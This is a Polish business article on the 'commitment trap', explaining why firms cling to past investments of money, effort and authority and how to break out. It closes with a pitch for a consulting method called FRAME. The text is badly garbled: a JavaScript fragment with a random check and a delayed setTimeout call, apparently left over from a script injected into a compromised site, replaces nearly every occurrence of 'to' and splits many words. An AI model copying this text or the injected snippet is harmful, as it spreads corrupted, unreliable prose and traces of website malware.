In Artykuły, Handel, Uniwersalne

Organizacje są konserwatywne. Równie konserwatywne (choć mniej) są przedsiębiorstwa. Za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to bardziej konserwatywni (bo wygodni) są ich pracownicy. Organizacje sprzedażowe są zaś bardziej (z reguły) konserwatywne, niż te np. produkcyjne, gdzie postęp i zmiany wymusza choćby postęp technologiczny. W sprzedaży niewiele się zmieniło od Fenicjan, a pierwsza poważna rewolucja, czyli Internet, spotykała się na początku z lekceważeniem czy niechęcią.

To wszystko oznacza, że firmy nie chcą się zmieniać. A muszą, gdyż inaczej połknie ich rynek. Ale oprócz tego, że są konserwatywne, istnieją jeszcze inne, w miarę racjonalne (czy może bardziej – uzasadnione) powody niechęci do zmiany dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to pułapka zaangażowania.

Uwaga. „co dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jest zaangażowanie?” To pułapka, w jaką (zwykle w dobrej wierze) wchodzą przedsiębiorstwa. Coś robią (czyli jednak zmieniają), ale nagle okazuje się, że robią źle. Albo tylko trzeba zmienić kierunek marszu. I zaczyna się problem. Z jednej strony trzeba się przyznać do błędu (pomyłki), a dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to cios dla ego. Ale z drugiej szkoda utraconego (w tej sytuacji) czasu i zasobów.

Zarówno konserwatyzm, jak i wygoda dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to powody tak naprawdę irracjonalne, o podłożu psychologicznym. Tymczasem pułapka zaangażowania ma podłoże racjonalne, a przynajmniej tak się wydaje. Duża część przypadków zaangażowania też ma podłoże psychologiczne, w postaci zaangażowania au dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torytetu („ja nie miałem racji?”). I o ile niechęć do zmian można pokonać umiejętnym zarządzaniem, o tyle z pułapką zaangażowania jest trudniej. Tu bowiem w grę wchodzi zabójcza mieszanka psychologii (ego) z interesami. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to groźny przeciwnik zmiany.

Jak działa pułapka zaangażowania? Niestety bardzo skutecznie. Ale zawsze za pomocą zaangażowania jakichś zasobów, czasem materialnych, czasem niematerialnych jak np. au dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torytet, ale zawsze takich, do których firma (czy częściej jej pracownicy) są przywiązani. I których nie chcą stracić.

Zasoby materialne. To najczęściej chyba kojarzone zaangażowanie (choć nie najpowszechniejsze – takim jest chyba jednak au dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torytet). Jakieś pieniądze zostały już wydane, jakieś zasoby kupione czy zmienione. I szkoda tego stracić. Jedna dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dość łatwy do pokonania problem – mianowicie da się go wyliczyć. I jakby co porównać z kosztami kontynuowania. Tu jedyne możliwe przeszkody dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to trudności (chęć?) wyceny, ile może kosz dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować powstrzymanie się od zmiany.. A bez tego nie da się porównać i podjąć racjonalnej decyzji.

Zaangażowanie organizacyjne. K dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toś coś zrobił, napracował się, wykonał. I teraz ma dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zmienić? Szkoda tego wysiłku. To nie jest zwykle wysoki koszt, ale trudny (z punktu widzenia pułapki zaangażowania). Po pierwsze, praktycznie niewyliczalny, bo i jak? W godzinach pracy? Ale główna trudność, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to że nie uświadomiony i nie komunikowany (więc trudno się z nim zmierzyć). Zwykle próbuje podszyć się pod zaangażowanie zasobów, ukrywając prawdziwy powód. No i zahacza o ego, a dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to temat trudny i tym bardziej nieprzezwyciężalny.

Zaangażowanie au dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torytetu. To najtrudniejsza forma pułapki zaangażowania. Tu na szali s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toi coś, co nie ma ceny. Ego i pozycja w firmie, częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to też mit nieomylności. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to trudny przeciwnik i właściwie nie ma sposobu, aby z nim wygrać, przynajmniej na forum wewnętrznym. Tu raczej nie ma innego wyjścia. Trzeba sięgnąć do zewnętrznych zasobów i próbować dokonać zmiany siłami zewnętrznymi, wynająć konsultanta czy zatrudnić nową osobę zarządzającą.

Może lepiej poczekać?

To najwygodniejsza droga, aby wyjść z pułapki zaangażowania. Ale też droga najbardziej niebezpieczna. Gdyż utraci się w ten sposób najcenniejszy element zmiany, czyli czas.

W o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczeniu najszybciej zmieniają się cechy, np. technologia. Rynek i konkurenci podążają za zmianą cech z pewnym opóźnieniem, co zresztą daje firmie, której uda się przełamać pułapkę zaangażowania pewną przewagę (przede wszystkim czasową). Gdyż sekret stanowi dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, że dos dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosować trzeba się do zmiany cech, a nie zmiany na rynku czy u konkurencji.

Jak wyjść z pułapki zaangażowania?

A wyjść trzeba. Gdyż inaczej utraci się (w końcu) przewagę konkurencyjną.

Pierwszym krokiem jest przyznanie się, że faktycznie tkwi się w pułapce. Ale zaraz potem trzeba odżałować utracone zasoby (najłatwiej dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zrobić, licząc, ile się utraci,

Drogi wyjścia z pułapki zaangażowania.

Tak naprawdę dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie są osobne sposoby przełamania pułapki zaangażowania. To raczej fazy procesu, który zawsze powinien objąć wszystkie 3 fazy. Gdyż w przypadku pułapki zaangażowania rzadko jest tak, że powody pojawienia się pułapki zaangażowania występują osobno. Najczęściej w mniejszym czy większym s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topniu współistnieją, a tylko jeden z nich wydaje się najważniejszy, gdyż dominuje.

Powody pułapki zaangażowania zwykle współistnieją. I trzeba się mierzyć nie z każdym osobno, ale ze wszystkimi na raz, choć w różnej proporcji. Na rysunku kolor oznacza trudność zmiany, im ciemniej, tym trudniej.

Jest jednak i dobra wiadomość. Adresować trzeba wprawdzie wszystko, ale nie wszystko od razu. I jednocześnie. Najłatwiej zmierzyć się z zasobami (są wyliczalne i jednocześnie najbardziej „neutralne” psychologicznie). I od tego można zacząć zmianę, od pokazania, ile można stracić. I dopiero wtedy wziąć się za najtrudniejsze, czyli za ego..

Podsumowanie

Zmiany są potrzebne. Organizacje muszą się zmieniać, gdyż zmienia się ich o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczenie. Jednak wiele firm stara się ich uniknąć tak długo, jak tylko się da. Częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to kwestia psychologiczna (obrona własnego ego – musieliby się przyznać do porażki własnego rozwiązania), czasem dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to kwestia wygody. Wtedy broni się rozwiązania, gdyż już się je zna i nie trzeba się niczego nowego uczyć.

Ale zdarza się i inna, trudniejsza do pokonania przeszkoda do zmiany. To pułapka zaangażowania. Tu firma broni już zainwes dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towanych zasobów, których jej po prostu szkoda. Będą przecież wyrzucone w bło dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to. Tymczasem powstrzymanie się od zmiany dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jeszcze większa strata zasobów, tym razem grożąca utratą całej firmy (która po prostu może zbankru dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować). Ale i bez bankructwa brak dos dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosowania może drogo kosz dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować, zwykle dużo drożej niż kwota zaangażowana do tej pory.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.